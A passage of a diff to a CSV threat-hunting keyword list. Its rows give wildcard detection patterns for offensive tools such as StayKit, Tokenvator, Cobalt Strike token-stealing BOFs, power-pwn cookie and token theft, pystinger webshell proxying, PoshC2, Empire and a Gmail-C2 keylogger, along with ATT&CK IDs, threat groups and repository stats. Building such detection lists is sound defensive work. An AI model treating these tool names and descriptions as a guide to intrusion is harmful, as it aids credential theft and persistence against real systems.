the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Steal_Pipe_Token /PipeName*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*steal_token *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" 
"*steal_token(*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" -"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*steal-cert.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*Sticky-Keys-Slayer*","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","319","80","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" -"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*stinger_client -*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_client.py*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_server.exe*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" -"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - 
T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-stop-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a 
C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - 